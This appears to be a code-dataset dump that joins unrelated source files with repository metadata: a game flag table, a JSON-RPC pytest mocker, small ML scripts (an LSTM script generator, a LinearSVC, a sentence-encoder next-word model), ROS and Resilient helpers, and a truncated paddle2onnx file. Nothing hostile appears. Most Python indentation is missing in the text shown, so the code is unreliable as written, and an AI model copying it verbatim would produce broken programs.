750: 'LEFT_HOME_AT_LEAST_ONCE',
751: 'CHAOS_THEATER_AUDIENCE_ABSENT',
752: 'HINT_GUY_ABSENT',
753: 'NESS_HOUSE_PHONE_RINGING',
754: 'PREVENT_TELEPORT',
755: 'GOT_INSIGNIFICANT_ITEM',
756: 'DUNGEON_MAN_IN_PARTY',
757: 'GEORGE_HAS_DIAMOND',
758: 'GOING_TO_MAGICANT_MUSIC',
759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852
760: 'PHASE_DISTORTER_MUSIC',
# 761 (Unknown. Set when arriving in Threed, cleared when defeating Belch)
762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN',
763: 'PICKY_KNOCKING_ON_DOOR',
764: 'READY_TO_LEARN_TELEPORT',
765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS',
766: 'EXIT_MOUSE_DISAGREEABLE',
767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS',
768: 'PAID_MUSEUM_ENTRANCE_FEE',
# 769 (Checked when you talk to Tracy after defeating Giygas, but never set)
770: 'LAST_ESCARGO_EXPRESS_CALL',
# 771 (???)
772: 'LAST_DAD_CALL',
773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459
774: 'TALKED_TO_MOONSIDE_SAILOR_MAN',
# 775 (Can't get calls from Dad?)
776: 'PAULA_AT_MONOTOLI_BUILDING',
777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA',
778: 'EXIT_MOUSE_ASLEEP',
# 779 (Related to PREVENT_TELEPORT?)
# 780 (If set, Maxwell doesn't actually save your game. WHAT?)
805: 'PRESENT_CRACKED_BAT',
829: 'PRESENT_TONY_COOKIE_1',
830: 'PRESENT_TONY_COOKIE_2',
831: 'PRESENT_TONY_COOKIE_3',
832: 'PRESENT_TONY_COOKIE_4',
833: 'PRESENT_TONY_COOKIE_5',
834: 'PRESENT_TONY_COOKIE_6',
835: 'PRESENT_TONY_COOKIE_7'
}
| 1.3125 | 1 |
xjsonrpc/client/integrations/pytest.py | bernhardkaindl/pjrpc | 0 | 12796216 | """
`pytest <https://docs.pytest.org/en/latest/>`_ client library integration.
Implements some utilities for mocking out ``xjsonrpc`` library clients.
"""
import asyncio
import collections
import functools as ft
import json
import unittest.mock
from typing import Any, Callable, Dict, Optional, Union
import pytest
import xjsonrpc
from xjsonrpc import Response
from xjsonrpc.common import UNSET, UnsetType
class Match:
"""
Match object. Incorporates request matching information.
"""
def __init__(
self,
endpoint: str,
version: str,
method_name: str,
once: bool,
callback: Optional[Callable],
**response_data: Any,
):
self.endpoint = endpoint
self.version = version
self.method_name = method_name
self.once = once
self.callback = callback
self.response_data = response_data
class PjRpcMocker:
"""
Synchronous JSON-RPC client mocker.
:param target: method to be mocked
:param mocker: mocking package
:param passthrough: pass not mocked requests to the original method
"""
def __init__(self, target, mocker=unittest.mock, passthrough: bool = False):
self._target = target
self._mocker = mocker
self._patcher = None
self._async_resp = False
self._passthrough = passthrough
self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list))
self._calls: Dict = collections.defaultdict(dict)
@property
def calls(self) -> Dict:
"""
        Dictionary of JSON-RPC method calls.
"""
return self._calls
def add(
self,
endpoint: str,
method_name: str,
result: UnsetType = UNSET,
error: UnsetType = UNSET,
id: Optional[Union[int, str]] = None,
version: str = '2.0',
once: bool = False,
callback: Optional[Callable] = None,
) -> None:
"""
Appends response patch. If the same method patch already exists they will be used in a round-robin way.
:param endpoint: request endpoint
:param method_name: method name
:param result: patched result
:param error: patched error
:param id: patched request id
:param version: patched request version
:param once: if ``True`` the patch will be deleted after the first call
:param callback: patched request callback
"""
match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback)
self._matches[endpoint][(version, method_name)].append(match)
def replace(
self,
endpoint: str,
method_name: str,
result: UnsetType = UNSET,
error: UnsetType = UNSET,
id: Optional[Union[int, str]] = None,
version: str = '2.0',
once: bool = False,
callback: Optional[Callable] = None,
idx: int = 0,
):
"""
Replaces a previously added response patch by a new one.
:param endpoint: request endpoint
:param method_name: method name
:param result: patched result
:param error: patched error
:param id: patched request id
:param version: patched request version
:param once: if ``True`` the patch will be deleted after the first call
:param callback: patched request callback
:param idx: patch index (if there are more than one)
"""
match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback)
self._matches[endpoint][(version, method_name)][idx] = match
def remove(self, endpoint: str, method_name: Optional[str] = None, version: str = '2.0'):
"""
Removes a previously added response patch.
:param endpoint: request endpoint
:param method_name: method name
:param version: JSON-RPC request version
:returns: removed response patch
"""
if method_name is None:
result = self._matches.pop(endpoint)
else:
result = self._matches[endpoint].pop((version, method_name))
self._cleanup_matches(endpoint, version, method_name)
return result
def reset(self) -> None:
"""
        Removes all added matches and resets call statistics.
"""
self._matches.clear()
for calls in self._calls.values():
for stub in calls.values():
stub.reset_mock()
self._calls.clear()
def start(self):
"""
Activates a patcher.
"""
patcher = self._mocker.patch(self._target)
with patcher:
if asyncio.iscoroutinefunction(patcher.temp_original):
self._async_resp = True
if self._async_resp:
async def side_effect(*args, **kwargs):
return await self._on_request(*args, **kwargs)
else:
def side_effect(*args, **kwargs):
return self._on_request(*args, **kwargs)
self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True)
return self._patcher.start()
def stop(self) -> None:
"""
        Stops an active patcher.
"""
self.reset()
self._patcher.stop()
def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] = None) -> None:
matches = self._matches[endpoint].get((version, method_name))
if not matches:
self._matches[endpoint].pop((version, method_name), None)
if not self._matches[endpoint]:
self._matches.pop(endpoint)
def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any):
endpoint = origin_self._endpoint
matches = self._matches.get(endpoint)
if matches is None:
if self._passthrough:
return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs)
else:
raise ConnectionRefusedError()
json_data = json.loads(request_text)
if isinstance(json_data, (list, tuple)):
response = xjsonrpc.BatchResponse()
for request in xjsonrpc.BatchRequest.from_json(json_data):
response.append(
self._match_request(endpoint, request.version, request.method, request.params, request.id),
)
else:
request = xjsonrpc.Request.from_json(json_data)
response = self._match_request(endpoint, request.version, request.method, request.params, request.id)
if self._async_resp:
async def wrapper():
return json.dumps(response.to_json())
return wrapper()
else:
return json.dumps(response.to_json())
def _match_request(
self,
endpoint: str,
version: str,
method_name: str,
params: Optional[Union[list, dict]],
id: Optional[Union[int, str]],
) -> Response:
matches = self._matches[endpoint].get((version, method_name))
if matches is None:
return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name))
match = matches.pop(0)
if not match.once:
matches.append(match)
self._cleanup_matches(endpoint, version, method_name)
stub = self.calls[endpoint].setdefault(
(version, method_name),
self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'),
)
if isinstance(params, (list, tuple)):
stub(*params)
else:
stub(**params)
if match.callback:
if isinstance(params, (list, tuple)):
result = match.callback(*params)
else:
result = match.callback(**params)
return xjsonrpc.Response(id=id, result=result)
else:
return xjsonrpc.Response(
id=id or match.response_data['id'],
result=match.response_data['result'],
error=match.response_data['error'],
)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
self.reset()
# shortcuts
PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request')
PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request')
@pytest.fixture
def xjsonrpc_requests_mocker():
"""
Requests client mocking fixture.
"""
with PjRpcRequestsMocker() as mocker:
yield mocker
@pytest.fixture
def xjsonrpc_aiohttp_mocker():
"""
Aiohttp client mocking fixture.
"""
with PjRpcAiohttpMocker() as mocker:
yield mocker
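# Editor-added usage sketch (not part of the library). It assumes the requests
# backend exposes Client(endpoint) with a `proxy` attribute, as in the regular
# xjsonrpc client API, and that the endpoint passed to add() matches the client's
# endpoint. Named without a `test_` prefix so pytest won't collect it.
def _example_requests_mocker_usage():
    import xjsonrpc.client.backend.requests as requests_backend

    with PjRpcRequestsMocker() as mocker:
        # Stub the remote 'sum' method on this endpoint to always return 3.
        mocker.add('http://example.com/api/v1', 'sum', result=3)
        client = requests_backend.Client('http://example.com/api/v1')
        assert client.proxy.sum(1, 2) == 3
        # Calls are recorded per endpoint and (version, method) pair.
        assert ('2.0', 'sum') in mocker.calls['http://example.com/api/v1']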
| 2.4375 | 2 |
scripts/temp/palindrome.py | AgnirudraSil/tetris | 3 | 12796217 | <reponame>AgnirudraSil/tetris<filename>scripts/temp/palindrome.py
inp = input("Enter a number or word: ")
if inp[::-1].lower() == inp.lower():
print("Palindrome")
else:
print("Not Palindrome")
| 3.734375 | 4 |
schedy/pbt.py | incalia/schedy-client | 4 | 12796218 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
#: Minimize the objective
MINIMIZE = 'min'
#: Maximize the objective
MAXIMIZE = 'max'
class Truncate(object):
_EXPLOIT_STRATEGY_NAME = 'truncate'
def __init__(self, proportion=0.2):
'''
Truncate exploit strategy: if the selected candidate job is in the
worst n%, use a candidate job in the top n% instead.
Args:
proportion (float): Proportion of jobs that are considered to be
"best" jobs, and "worst" jobs. For example, if ``proportion =
0.2``, if the selected candidate job is in the bottom 20%, it
will be replaced by a job in the top 20%. Must satisfy ``0 <
proportion <= 0.5``.
'''
self.proportion = proportion
def _get_params(self):
return self.proportion
@classmethod
def _from_params(cls, params):
proportion = float(params)
return cls(proportion)
def __eq__(self, other):
return type(self) == type(other) and \
self.proportion == other.proportion
class Perturb(object):
_EXPLORE_STRATEGY_NAME = 'perturb'
def __init__(self, min_factor=0.8, max_factor=1.2):
'''
Perturb explore strategy: multiply the designated hyperparameter by a
random factor, sampled from a uniform distribution.
Args:
min_factor (float): Minimum value for the factor (inclusive).
max_factor (float): Maximum value for the factor (exclusive).
'''
self.min_factor = min_factor
self.max_factor = max_factor
def _get_params(self):
return {
'minFactor': float(self.min_factor),
'maxFactor': float(self.max_factor),
}
@classmethod
def _from_params(cls, params):
min_factor = float(params['minFactor'])
max_factor = float(params['maxFactor'])
return cls(min_factor, max_factor)
def __eq__(self, other):
return type(self) == type(other) and \
self.min_factor == other.min_factor and \
self.max_factor == other.max_factor
_EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [
Truncate
]}
_EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [
Perturb
]}
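# Editor's illustrative sketch (not part of the library): the strategies above
# round-trip through their plain wire parameters via the internal helpers.
def _demo_strategy_roundtrip():
    explore = Perturb(min_factor=0.9, max_factor=1.1)
    assert Perturb._from_params(explore._get_params()) == explore
    exploit = Truncate(proportion=0.25)
    assert Truncate._from_params(exploit._get_params()) == exploit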
| 3.375 | 3 |
dl/pytorch/rnn/tv_script.py | xta0/Python-Playground | 0 | 12796219 | # load in data
import helper
import numpy as np
import torch
import torch.nn as nn
from string import punctuation
from collections import Counter
from torch.utils.data import TensorDataset, DataLoader
data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)
# Check for a GPU
train_on_gpu = torch.cuda.is_available()
if not train_on_gpu:
print('No GPU found. Please use a GPU to train your neural network.')
def create_lookup_tables(text):
"""
Create lookup tables for vocabulary
:param text: The text of tv scripts split into words
:return: A tuple of dicts (vocab_to_int, int_to_vocab)
"""
word_counts = Counter(text)
sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True)
int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)}
vocab_to_int = {word: ii for ii, word in int_to_vocab.items()}
return vocab_to_int, int_to_vocab
def token_lookup():
"""
Generate a dict to turn punctuation into a token.
:return: Tokenized dictionary where the key is the punctuation and the value is the token
"""
return {
'.': '||PERIOD||',
',': '||COMMA||',
'"': '||QUOTATION_MARK||',
';': '||SEMICOLON||',
'!': '||EXCLAMATION_MARK||',
'?': '||QUESTION_MARK||',
        '(': '||LEFT_PAREN||',
')': '||RIGHT_PAREN||',
'-': '||DASH||',
'\n': '||RETURN||',
}
helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)
def batch_data(words, sequence_length, batch_size):
"""
Batch the neural network data using DataLoader
:param words: The word ids of the TV scripts
:param sequence_length: The sequence length of each batch
:param batch_size: The size of each batch; the number of sequences in a batch
:return: DataLoader with batched data
"""
n_batches = len(words)//batch_size
words = words[:n_batches*batch_size]
features = []
targets = []
total = len(words)-sequence_length
for idx in range(0, total):
x = words[idx:idx+sequence_length]
features.append(x)
y = words[idx+sequence_length]
targets.append(y)
train_x = np.array(features)
train_y = np.array(targets)
train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y))
train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size)
# return a dataloader
return train_loader
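# Editor's sanity sketch (illustrative only, never called): with words = range(10),
# sequence_length=3 and batch_size=2, the first feature row is [0, 1, 2] and its
# target is 3, i.e. each target is the word immediately after its sequence.
def _batch_data_sanity_check():
    loader = batch_data(list(range(10)), sequence_length=3, batch_size=2)
    sample_x, sample_y = next(iter(loader))
    assert tuple(sample_x.shape) == (2, 3) and tuple(sample_y.shape) == (2,)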
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
print(token_dict)
print(int_text[:10])
print(list(vocab_to_int.values())[:10])
print(list(int_to_vocab.values())[:10])
class RNN(nn.Module):
def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
"""
Initialize the PyTorch RNN Module
:param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
:param output_size: The number of output dimensions of the neural network
:param embedding_dim: The size of embeddings, should you choose to use them
:param hidden_dim: The size of the hidden layer outputs
:param dropout: dropout to add in between LSTM/GRU layers
"""
super(RNN, self).__init__()
# set class variables
self.output_size = output_size
self.n_layers = n_layers
self.hidden_dim = hidden_dim
# define model layers
self.embedding = nn.Embedding(vocab_size, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers,
dropout=dropout, batch_first=True)
self.fc = nn.Linear(hidden_dim, output_size)
self.dropout = nn.Dropout(dropout)
def forward(self, nn_input, hidden):
"""
Forward propagation of the neural network
:param nn_input: The input to the neural network
:param hidden: The hidden state
:return: Two Tensors, the output of the neural network and the latest hidden state
"""
batch_size = nn_input.size(0)
x = self.embedding(nn_input)
x,h = self.lstm(x, hidden)
x = x.contiguous().view(-1, self.hidden_dim)
# x = self.dropout(x)
x = self.fc(x)
x = x.view(batch_size, -1, self.output_size)
x = x[:, -1]
# return one batch of output word scores and the hidden state
return x, h
def init_hidden(self, batch_size):
'''
Initialize the hidden state of an LSTM/GRU
:param batch_size: The batch_size of the hidden state
:return: hidden state of dims (n_layers, batch_size, hidden_dim)
'''
# Implement function
weight = next(self.parameters()).data
if (train_on_gpu):
hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(),
weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda())
else:
hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),
weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())
return hidden
def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
"""
Forward and backward propagation on the neural network
:param decoder: The PyTorch Module that holds the neural network
:param decoder_optimizer: The PyTorch optimizer for the neural network
:param criterion: The PyTorch loss function
:param inp: A batch of input to the neural network
:param target: The target output for the batch of input
:return: The loss and the latest hidden state Tensor
"""
# move data to GPU, if available
if train_on_gpu:
inp, target = inp.cuda(), target.cuda()
# perform backpropagation and optimization
h = tuple([each.data for each in hidden])
rnn.zero_grad()
output, h = rnn(inp, h)
loss = criterion(output, target)
loss.backward()
nn.utils.clip_grad_norm_(rnn.parameters(), 5)
optimizer.step()
# return the loss over a batch and the hidden state produced by our model
return loss.item(), h
def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
batch_losses = []
rnn.train()
print("Training for %d epoch(s)..." % n_epochs)
for epoch_i in range(1, n_epochs + 1):
# initialize hidden state
hidden = rnn.init_hidden(batch_size)
for batch_i, (inputs, labels) in enumerate(train_loader, 1):
# make sure you iterate over completely full batches, only
n_batches = len(train_loader.dataset)//batch_size
if(batch_i > n_batches):
break
# forward, back prop
loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
# record loss
batch_losses.append(loss)
# printing loss stats
if batch_i % show_every_n_batches == 0:
print('Epoch: {:>4}/{:<4} Loss: {}\n'.format(
epoch_i, n_epochs, np.average(batch_losses)))
batch_losses = []
# returns a trained rnn
return rnn
# Data params
# Sequence Length
sequence_length = 8 # of words in a sequence
# Batch Size
batch_size = 100
# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)
# Training parameters
# Number of Epochs
num_epochs = 5
# Learning Rate
learning_rate = 0.001
# Model parameters
# Vocab size
vocab_size = len(vocab_to_int)
# Output size
output_size = vocab_size
# Embedding Dimension
embedding_dim = 128
# Hidden Dimension
hidden_dim = 512
# Number of RNN Layers
n_layers = 2
# Show stats for every n number of batches
show_every_n_batches = 500
# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
rnn.cuda()
# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()
# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)
# saving the trained model
helper.save_model('./trained_tv_script', trained_rnn)
print('Model Trained and Saved')
_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
trained_rnn = helper.load_model('./trained_tv_script')
import torch.nn.functional as F
def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):
"""
Generate text using the neural network
:param decoder: The PyTorch Module that holds the trained neural network
:param prime_id: The word id to start the first prediction
:param int_to_vocab: Dict of word id keys to word values
:param token_dict: Dict of puncuation tokens keys to puncuation values
:param pad_value: The value used to pad a sequence
:param predict_len: The length of text to generate
:return: The generated text
"""
rnn.eval()
# create a sequence (batch_size=1) with the prime_id
current_seq = np.full((1, sequence_length), pad_value)
current_seq[-1][-1] = prime_id
predicted = [int_to_vocab[prime_id]]
for _ in range(predict_len):
if train_on_gpu:
current_seq = torch.LongTensor(current_seq).cuda()
else:
current_seq = torch.LongTensor(current_seq)
# initialize the hidden state
hidden = rnn.init_hidden(current_seq.size(0))
# get the output of the rnn
output, _ = rnn(current_seq, hidden)
# get the next word probabilities
p = F.softmax(output, dim=1).data
if(train_on_gpu):
p = p.cpu() # move to cpu
# use top_k sampling to get the index of the next word
top_k = 5
p, top_i = p.topk(top_k)
top_i = top_i.numpy().squeeze()
# select the likely next word index with some element of randomness
p = p.numpy().squeeze()
word_i = np.random.choice(top_i, p=p/p.sum())
# retrieve that word from the dictionary
word = int_to_vocab[word_i]
predicted.append(word)
# the generated word becomes the next "current sequence" and the cycle can continue
current_seq = np.roll(current_seq, -1, 1)
current_seq[-1][-1] = word_i
gen_sentences = ' '.join(predicted)
# Replace punctuation tokens
for key, token in token_dict.items():
ending = ' ' if key in ['\n', '(', '"'] else ''
gen_sentences = gen_sentences.replace(' ' + token.lower(), key)
gen_sentences = gen_sentences.replace('\n ', '\n')
gen_sentences = gen_sentences.replace('( ', '(')
# return all the sentences
return gen_sentences
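# --- Editor's illustrative sketch ------------------------------------------
# A minimal, self-contained example of the top-k re-sampling step used inside
# `generate` above. The probabilities and k below are hypothetical, and this
# helper is never called by the script; it only illustrates the idea.
def _topk_sample_demo(probs, k=5):
    """Sample an index from the k most likely entries of `probs`."""
    import numpy as _np
    probs = _np.asarray(probs, dtype=float)
    top_idx = _np.argsort(probs)[-k:]      # indices of the k largest probabilities
    top_p = probs[top_idx]
    top_p = top_p / top_p.sum()            # renormalise over the kept entries
    return _np.random.choice(top_idx, p=top_p)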
# run the cell multiple times to get different results!
gen_length = 400 # modify the length to your preference
prime_word = 'jerry' # name for starting the script
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
pad_word = helper.SPECIAL_WORDS['PADDING']
generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)
print(generated_script) | 2.921875 | 3 |
python3/incident/set-owner-and-members-by-phase.py | ibmresilient/resilient-scripts | 26 | 12796220 | <filename>python3/incident/set-owner-and-members-by-phase.py
# (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved.
# Script to set incident owner and members based on Incident Phase.
# To be run when the phase changes.
# Phase is a select field with API name `phase_id`,
# so the tests below are written as
# if incident.phase_id == "value":
# Based on the current phase name, set a single Group or User as Incident Owner.
# NOTE:
# When you change the owner of an incident, the previous owner is removed,
# but also automatically added to Members so they still have access to the incident.
if incident.phase_id == 'Post-Incident':
incident.owner_id = "Group_Name"
elif incident.phase_id == 'Some Other Phase':
incident.owner_id = "<EMAIL>"
# Based on the current phase name, add members to the incident.
# The list of members can include multiple groups and individual users.
# NOTE:
# Here we **add** the new members to the existing list,
# don't just overwrite the existing list (which would remove members)!
if incident.phase_id == 'Phase_Name':
incident.members = list(incident.members) + \
["Group_Name", "<EMAIL>"]
| 2.78125 | 3 |
data/external/repositories_2to3/238397/ucla-cs145-kaggle-master/linearsvclassifier.py | Keesiu/meta-kaggle | 0 | 12796221 | <gh_stars>0
"""
linearsvclassifier.py
Builds a linear support vector classifier
~78 pct accuracy, 0m10.881s execution time
"""
from classifier import Classifier
from matrixdatabase import MatrixDatabase
from sklearn.svm import LinearSVC as SVC
class LinearSVClassifier(Classifier):
def __init__(self, matrixdatabase):
self._matrix_database = matrixdatabase
self._has_fit = False
self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False)
def learn(self, ingredients, cuisine):
return
def classify(self, ingredients):
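        # The training matrix is built and the SVC fitted lazily, on the first
        # call to classify(); subsequent calls reuse the already fitted model.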
if not self._has_fit:
matrix, classes = self._matrix_database.make_train_matrix()
self._svc = self._svc.fit(matrix, classes)
print('Fitting complete...')
self._has_fit = True
output = self._svc.predict(self._matrix_database.make_row_from_recipe(ingredients))
return output[0] | 2.390625 | 2 |
alana_pepper/src/alana_node_classes/behaviour_manager.py | cdondrup/inaugural_pepper | 0 | 12796222 | import rospy
import service_utils as su
from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest
from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest
def start_behaviour(name):
su.call_service(
"/naoqi_driver/behaviour_manager/start_behaviour",
BehaviorManagerControl,
BehaviorManagerControlRequest(name=name)
)
def stop_behaviour(name):
su.call_service(
"/naoqi_driver/behaviour_manager/stop_behaviour",
BehaviorManagerControl,
BehaviorManagerControlRequest(name=name)
)
def toggle_behaviour(name):
try:
start_behaviour(name)
except:
pass
try:
stop_behaviour(name)
except:
pass
def wait_for_behaviour(name):
while not rospy.is_shutdown():
if name not in su.call_service(
"/naoqi_driver/behaviour_manager/get_running_behaviors",
BehaviorManagerInfo,
BehaviorManagerInfoRequest()
).behaviors:
return
else:
rospy.sleep(.01)
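# Editor's illustrative sketch: hypothetical usage of the helpers above from a
# ROS node. The behaviour name "my_behaviour" is an assumption, not a real
# behaviour shipped with the robot; the function is defined but never called.
def _demo_usage():
    toggle_behaviour("my_behaviour")    # start it if stopped, stop it if running
    wait_for_behaviour("my_behaviour")  # block until it is no longer running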
| 2.171875 | 2 |
next_word_prediction_using_universal_sentence_encoder.py | Adminixtrator/Next-Word-Prediction-using-Universal-Sentence-Encoder. | 4 | 12796223 | # -*- coding: utf-8 -*-
"""Next-Word Prediction using Universal Sentence Encoder.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL
# **Google drive for local storage**
_NB: All comments are written to facilitate smooth evaluation of the model, that the **Current User** may be less fatigued and see beauty in the good work._
Uncomment text under **PREVIEW OUTPUT** to further scrutinize.
"""
# Commented out IPython magic to ensure Python compatibility.
# This cell will prompt an external url to accept permissions for Colab to access Google Drive
from google.colab import drive
drive.mount("/gdrive")
# %ls
"""# **Import ***"""
# Getting all required libraries
import os
import re
import gdown
import numpy
import string
import numpy as np
import pandas as pd
import seaborn as sns
import tensorflow as tf
from absl import logging
import tensorflow_hub as hub
from tensorflow import keras
import matplotlib.pyplot as plt
from keras.models import Sequential
import tensorflow.keras.backend as K
from keras.layers.recurrent import LSTM
from keras.layers import Dense, Activation
from keras.callbacks import LambdaCallback
from keras.utils.data_utils import get_file
from keras.layers.embeddings import Embedding
from sklearn.model_selection import train_test_split
"""## **Data preparation - _Generating Corpus_**"""
# Download data from Google drive
'''
ORIGINAL DATASET URL:
https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt
'''
url = 'https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW'
output = 'corpus.txt'
gdown.download(url, output, quiet=False)
# sentence_length = 40
# Read local file from directory
with open('corpus.txt') as subject:
cache = subject.readlines()
translator = str.maketrans('', '', string.punctuation) # Remove punctuation
lines = [doc.lower().translate(translator) for doc in cache] # Switch to lower case
# PREVIEW OUTPUT ::
# print(lines[0][:100])
# len(lines)
# Generate an list of single/independent words
vocabulary = list(set(' '.join(lines).replace('\n','').split(' ')))
primary_store = {}
for strings, texts in enumerate(vocabulary):
primary_store[texts] = strings
# PREVIEW OUTPUT ::
# print(vocabulary[:50])
# len(vocabulary)
# Splitting data into Train sets and test sets
X = []
y = []
for c in lines:
xxxx = c.replace('\n','').split(' ')
X.append(' '.join(xxxx[:-1])) # X from the corpus
yyyy = [0 for i in range(len(vocabulary))] # Generate Y from the Vocabulary
# yyyy[primary_store[xxxx[-1]]] = 1
yyyy[primary_store[xxxx[-1]]] = 1
y.append(yyyy)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
y_test = numpy.array(y_test)
y_train = numpy.array(y_train)
# PREVIEW OUTPUT ::
# print(X_train[:10])
# print(y_train[:10])
# print(X_test[:10])
# print(y_test[:10])
"""## **Embeddings!**"""
# Import the Universal Sentence Encoder's TF Hub module (Here we're making use of version 4)
# This will take a while but won't be long :)
module_url = "https://tfhub.dev/google/universal-sentence-encoder/4"
appreciate = hub.load(module_url)
# Making it easier - Function for embedding
def embed(goodness):
return appreciate(goodness)
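# Editor's note: the Universal Sentence Encoder produces a 512-dimensional
# embedding per input string, which is why the first Dense layer below uses
# input_shape=[512].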
# REVIEW OUTPUT ::
# appreciate.variables
# Wrapping up with the U-S-E
X_train = embed(X_train)
X_test = embed(X_test)
X_train = X_train.numpy()
X_test = X_test.numpy()
# PREVIEW OUTPUT ::
# print(X_train[:10])
# print(y_train[:10])
# print(X_test[:10])
# print(y_test[:10])
# print(X_train.shape, X_test.shape, y_test.shape, y_train.shape)
"""# **Building the model**"""
model = Sequential()
# model.add(Embedding(input_dim=len(vocabulary), output_dim=100))
# model.add(LSTM(units=100, input_shape=[512]))
model.add(Dense(512, input_shape=[512], activation = 'relu'))
model.add(Dense(units=len(vocabulary), activation = 'softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.summary()
# Training the model.
model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()])
"""#**Unto the tests!**"""
# Create function to predict and show detailed output
def next_word(collection=[], extent=1):
for item in collection:
text = item
for i in range(extent):
prediction = model.predict(x=embed([item]).numpy())
idx = np.argmax(prediction[-1])
item += ' ' + vocabulary[idx]
print(text + ' --> ' + item + '\nNEXT WORD: ' + item.split(' ')[-1] + '\n')
# Tests - please feel free to explore
single_text = ['and some other essential']
next_word(single_text)
# Testing on a collection of words
text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a']
next_word(text_collection)
"""## **For the record**
The Dataset is based on a Tensorflow tutorial from Stanford, so all predicted words will be based on Deep learning and Machine learning _common terms_.
"""
# Storing data
vocabulary = numpy.array(vocabulary)
numpy.save('./vocabulary.npy', vocabulary)
model.save('./NWP-USE')
## END OF NOTEBOOK | 2.3125 | 2 |
paddle2onnx/graph/dygraph_helper.py | neonhuang/Paddle2ONNX | 95 | 12796224 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
import warnings
import numpy as np
import inspect
import six
import paddle
from paddle.fluid.io import _get_valid_program
from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction
from paddle.fluid.layers.utils import flatten, pack_sequence_as
from collections import OrderedDict
from paddle.fluid import dygraph
from paddle.fluid.dygraph.jit import declarative
from paddle.fluid import core
from paddle.fluid import layers
from paddle.nn import Layer
from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard
from paddle.fluid.dygraph.layers import Layer
from paddle2onnx.utils import logging
from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops
def _get_input_var_names(inputs, input_spec):
name_none_error = "The %s's name is None. " \
"When using jit.save, please set InputSepc's name in " \
